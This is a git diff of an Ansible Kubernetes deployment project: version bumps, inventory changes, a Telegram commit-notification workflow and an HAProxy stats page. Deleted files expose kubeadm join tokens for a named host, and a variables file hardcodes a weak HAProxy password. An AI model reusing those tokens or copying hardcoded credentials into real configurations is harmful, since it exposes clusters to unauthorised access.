diff --git a/.github/workflows/telegram-notification.yml b/.github/workflows/telegram-notification.yml new file mode 100644 index 0000000..2b9f393 --- /dev/null +++ b/.github/workflows/telegram-notification.yml @@ -0,0 +1,29 @@ +name: Telegram Notification on Commit + +on: + push: + branches: + - main + pull_request: + branches: + - main + +jobs: + notify: + runs-on: ubuntu-latest + steps: + - name: Send Telegram Message + run: | + MESSAGE="🚀 *GitHub Action Triggered!*\n" + MESSAGE+="🔖 *Event:* ${{ github.event_name }}\n" + MESSAGE+="🌐 *Repository:* [${{ github.repository }}](${{ github.server_url }}/${{ github.repository }})\n" + MESSAGE+="🔗 *Branch:* ${{ github.ref }}\n" + MESSAGE+="👤 *Actor:* [${{ github.actor }}](${{ github.server_url }}/${{ github.actor }})\n" + MESSAGE+="💬 *Commit Message:* '${{ github.event.head_commit.message }}'\n" + curl -X POST \ + https://api.telegram.org/bot${{ secrets.TELEGRAM_BOT_TOKEN }}/sendMessage \ + -H 'Content-Type: application/json' \ + -d "{\"message_thread_id\": \"519\", \"chat_id\": \"${{ secrets.TELEGRAM_CHAT_ID }}\", \"text\": \"$MESSAGE\", \"parse_mode\": \"Markdown\"}" + env: + TELEGRAM_BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }} + TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }} diff --git a/.gitignore b/.gitignore index 57bf3e6..d3dc450 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,3 @@ -kubeconfig \ No newline at end of file +kubeconfig +roles/join_master/files/join-command +roles/join_worker/files/join-command \ No newline at end of file diff --git a/README.md b/README.md index 4a225e1..413b288 100644 --- a/README.md +++ b/README.md @@ -58,13 +58,14 @@ For join worker(s) node to cluster, follow these steps: ```bash ansible-playbook -i inventory/k8s-servers.ini kubernetes.yml --become --become-method=sudo -t join_worker ``` + #### If you like to use haproxy for loadbalancing in your kubernetes you can use these bellow step. -```basb +```bash ansible-playbook -i inventory/k8s-servers.ini kubernetes.yml --become --become-method=sudo -t lb ``` -and for finilize use +and for finilize use (If you use lb tag you MUST run the postinstall task) ```bash ansible-playbook -i inventory/k8s-servers.ini kubernetes.yml --become --become-method=sudo -t postinstall diff --git a/inventory/group_vars/all.yml b/inventory/group_vars/all.yml index c2f516b..e59461e 100644 --- a/inventory/group_vars/all.yml +++ b/inventory/group_vars/all.yml @@ -6,40 +6,35 @@ setup_interface: "false" #SSH ssh_port: 2222 -# Network Calico - -calico_operator_url: "https://raw.githubusercontent.com/projectcalico/calico/v3.27.0/manifests/tigera-operator.yaml" -calico_crd_url: "https://raw.githubusercontent.com/projectcalico/calico/v3.27.0/manifests/custom-resources.yaml" +# Network Calico see here for more details https://github.com/projectcalico/calico/releases +calico_operator_url: "https://raw.githubusercontent.com/projectcalico/calico/v3.29.0/manifests/tigera-operator.yaml" +calico_crd_url: "https://raw.githubusercontent.com/projectcalico/calico/v3.29.0/manifests/custom-resources.yaml" pod_network_cidr: "192.168.0.0/16" # DNS - -resolv_nameservers: [178.22.122.100, 185.51.200.2] # 403.online +resolv_nameservers: [8.8.8.8, 4.2.2.4] # 403.online # Sanction shekan - use_iran: "true" # change it to "false" if you are outside of iran # Docker - docker_gpg_key_url: "https://download.docker.com/linux/ubuntu/gpg" docker_gpg_key_path: "/etc/apt/keyrings/docker.gpg" docker_apt_repo: "https://download.docker.com/linux/ubuntu" # Kubernetes - kubernetes_gpg_keyring_path: "/etc/apt/keyrings/kubernetes-apt-keyring.gpg" -kubernetes_gpg_key_url: "https://pkgs.k8s.io/core:/stable:/v1.28/deb/Release.key" -kubernetes_apt_repo: "https://pkgs.k8s.io/core:/stable:/v1.28/deb/" -k8s_version: "1.28.5" +kubernetes_gpg_key_url: "https://pkgs.k8s.io/core:/stable:/v1.31/deb/Release.key" +kubernetes_apt_repo: "https://pkgs.k8s.io/core:/stable:/v1.31/deb/" +k8s_version: "1.31.2" # see here https://kubernetes.io/releases/patch-releases/ and https://github.com/kubernetes/kubernetes/releases # CRI - cri_socket: unix:///var/run/containerd/containerd.sock -# lb - -virtual_ip: "172.16.100.100" +# VRRP and HAProxy +interface_name: "enp0s8" +virtual_ip: "192.168.178.100" +haproxy_frontend_password: "121password121" # Disk diff --git a/inventory/k8s-servers.ini b/inventory/k8s-servers.ini index 96eee11..2c5da03 100644 --- a/inventory/k8s-servers.ini +++ b/inventory/k8s-servers.ini @@ -1,16 +1,16 @@ [all] # the first node is the first master node (k8s-test-master1) -k8s-test-master1 ansible_host=37.152.178.226 private_ip=172.16.100.11 -k8s-test-master2 ansible_host=185.97.118.58 private_ip=172.16.100.21 -k8s-test-master3 ansible_host=37.152.182.216 private_ip=172.16.100.31 +k8s-test-master1 ansible_host=192.168.178.11 private_ip=192.168.178.11 +k8s-test-master2 ansible_host=192.168.178.12 private_ip=192.168.178.12 +k8s-test-master3 ansible_host=192.168.178.13 private_ip=192.168.178.13 -k8s-test-worker1 ansible_host=37.32.21.250 private_ip=172.16.100.41 -; k8s-test-worker2 ansible_host=172.24.96.6 private_ip=172.16.100.22 +k8s-test-worker1 ansible_host=192.168.178.21 private_ip=192.168.178.21 +; k8s-test-worker2 ansible_host=192.168.178.22 private_ip=192.168.178.22 ; k8s-test-worker3 ansible_host=172.24.96.7 private_ip=172.16.100.23 -lb1-test ansible_host=185.206.92.135 private_ip=172.16.100.81 -lb2-test ansible_host=185.206.92.220 private_ip=172.16.100.91 +lb1-test ansible_host=192.168.178.50 private_ip=192.168.178.50 +lb2-test ansible_host=192.168.178.60 private_ip=192.168.178.60 [k8s] k8s-test-master1 @@ -27,8 +27,8 @@ k8s-test-master3 [k8s_workers] k8s-test-worker1 -# k8s-test-worker2 -# k8s-test-worker3 +; k8s-test-worker2 +; k8s-test-worker3 [lb] diff --git a/kubernetes.yml b/kubernetes.yml index f41406e..5e9dfc1 100644 --- a/kubernetes.yml +++ b/kubernetes.yml @@ -14,7 +14,7 @@ - hosts: k8s roles: - - role: k8s + - role: init_k8s gather_facts: yes any_errors_fatal: true tags: [init_k8s] @@ -22,6 +22,8 @@ - hosts: k8s_masters roles: + - role: preinstall + - role: k8s - role: join_master gather_facts: yes any_errors_fatal: true @@ -29,6 +31,8 @@ - hosts: k8s_workers roles: + - role: preinstall + - role: k8s - role: join_worker gather_facts: yes any_errors_fatal: true diff --git a/roles/init_k8s/tasks/initk8s.yaml b/roles/init_k8s/tasks/initk8s.yaml index 89354aa..56786b2 100644 --- a/roles/init_k8s/tasks/initk8s.yaml +++ b/roles/init_k8s/tasks/initk8s.yaml @@ -41,7 +41,7 @@ when: inventory_hostname == groups['k8s_masters'][0] delegate_to: "{{ groups['k8s_masters'][0] }}" -- name: Sleep for 300 seconds and reboot the Master1 server +- name: Sleep for 300 seconds and reboot the Master1 server | because we live in Iran :D wait_for: timeout: 300 delegate_to: localhost @@ -50,13 +50,14 @@ command: reboot async: 1 poll: 0 - ignore_errors: yes + # ignore_errors: yes delegate_to: "{{ groups['k8s_masters'][0] }}" -- name: Sleep for 300 seconds to Master1 up and running +- name: Sleep for 300 seconds to Master1 up and running | because we live in Iran :D wait_for: timeout: 300 delegate_to: localhost + # when: use_iran == "true" - name: Example Task After Reboot debug: diff --git a/roles/join_master/files/join-command b/roles/join_master/files/join-command deleted file mode 100644 index aead8bd..0000000 --- a/roles/join_master/files/join-command +++ /dev/null @@ -1 +0,0 @@ -kubeadm join espenu.sudoix.com:6443 --token avcdgg.ck9cfh0fbivkuq37 --discovery-token-ca-cert-hash sha256:8b5e16f9c548de3b34bb0f007e927f4c9eb315dd1bf8e32846a6f6dc1c67d391 $@ \ No newline at end of file diff --git a/roles/join_worker/files/join-command b/roles/join_worker/files/join-command deleted file mode 100644 index 115bd5a..0000000 --- a/roles/join_worker/files/join-command +++ /dev/null @@ -1 +0,0 @@ -kubeadm join espenu.sudoix.com:6443 --token qt9e7q.epmjfx2nwdkh2ojv --discovery-token-ca-cert-hash sha256:8b5e16f9c548de3b34bb0f007e927f4c9eb315dd1bf8e32846a6f6dc1c67d391 $@ \ No newline at end of file diff --git a/roles/k8s/tasks/k8s.yaml b/roles/k8s/tasks/k8s.yaml index d5c4306..a601a1e 100644 --- a/roles/k8s/tasks/k8s.yaml +++ b/roles/k8s/tasks/k8s.yaml @@ -8,9 +8,14 @@ regexp: '^([^#].*?\sswap\s+sw\s+.*)$' replace: '# \1' +- name: Check if ufw is installed + package_facts: + manager: "auto" + - name: Disable ufw # just in Ubuntu ufw: state: disabled + when: "'ufw' in ansible_facts.packages" - name: Ensure kernel modules for containerd are enabled lineinfile: diff --git a/roles/lb/tasks/basic.yaml b/roles/lb/tasks/basic.yaml index da0142a..7e3e594 100644 --- a/roles/lb/tasks/basic.yaml +++ b/roles/lb/tasks/basic.yaml @@ -18,7 +18,7 @@ src: keepalived.conf.j2 dest: /etc/keepalived/keepalived.conf -- name: Start and enable the keepalived service +- name: Retart and enable the keepalived service ansible.builtin.service: name: keepalived state: restarted diff --git a/roles/lb/templates/haproxy.cfg.j2 b/roles/lb/templates/haproxy.cfg.j2 index f83a259..d9c0b6c 100644 --- a/roles/lb/templates/haproxy.cfg.j2 +++ b/roles/lb/templates/haproxy.cfg.j2 @@ -1,3 +1,16 @@ +# HAProxy Statistics Report Page +frontend stats-frontend + bind *:8080 + mode http + stats enable + stats hide-version + stats uri /stats + stats realm Haproxy\ Statistics + stats auth admin:{{ haproxy_frontend_password }} # Change 'admin:password' to your desired strong username and password + +# No backend is required for exporting stats in HAProxy. + + frontend kubernetes-frontend bind *:6443 mode tcp diff --git a/roles/lb/templates/keepalived.conf.j2 b/roles/lb/templates/keepalived.conf.j2 index 1a68983..1764815 100644 --- a/roles/lb/templates/keepalived.conf.j2 +++ b/roles/lb/templates/keepalived.conf.j2 @@ -9,7 +9,7 @@ vrrp_script check_apiserver { vrrp_instance VI_1 { state BACKUP - interface eth1 # set your interface + interface {{ interface_name }} # set your interface virtual_router_id 1 priority 100 advert_int 5 diff --git a/roles/preinstall/handlers/main.yml b/roles/preinstall/handlers/main.yml index 7bed45b..bf777a0 100644 --- a/roles/preinstall/handlers/main.yml +++ b/roles/preinstall/handlers/main.yml @@ -3,5 +3,5 @@ - name: restart sshd service: - name: sshd + name: ssh state: restarted \ No newline at end of file diff --git a/roles/preinstall/tasks/basic.yaml b/roles/preinstall/tasks/basic.yaml index 487d8f9..792c809 100644 --- a/roles/preinstall/tasks/basic.yaml +++ b/roles/preinstall/tasks/basic.yaml @@ -10,6 +10,7 @@ path: "/etc/resolv.conf" state: absent ignore_errors: true + when: use_iran == "true" - name: Configure resolv.conf | Comment this task if you live in outside of Iran :) template: @@ -82,6 +83,7 @@ - open-iscsi - nfs-common - tzdata + - tree # - bpytop state: latest update_cache: true